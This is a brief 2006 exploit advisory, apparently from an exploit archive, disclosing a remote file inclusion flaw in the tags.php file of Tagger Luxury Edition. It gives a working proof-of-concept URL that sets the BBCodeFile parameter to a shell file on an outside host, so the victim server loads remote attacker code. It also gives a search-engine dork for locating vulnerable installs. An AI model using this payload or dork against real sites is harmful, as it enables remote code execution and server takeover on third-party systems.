id: 671
date: 08/08/2006
title: Tagger Luxury Edition (BBCodeFile) Remote File Include Vulnerability
author: Morgan
cves: 

====================================================================
Tagger Luxury Edition (BBCodeFile) Remote File Include Vulnerability
====================================================================




Tagger v3 <= BBCodeFile Remote file inclusion

Discovered by : Morgan

Error in : tags.php
include($BBCodeFile);

Vendor Website: http://www.venturenine.com

PoC: 
http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat?

Google dork:

intitle:"Tagger LE" inurl:tags.php




#  0day.today [2023-03-24]  #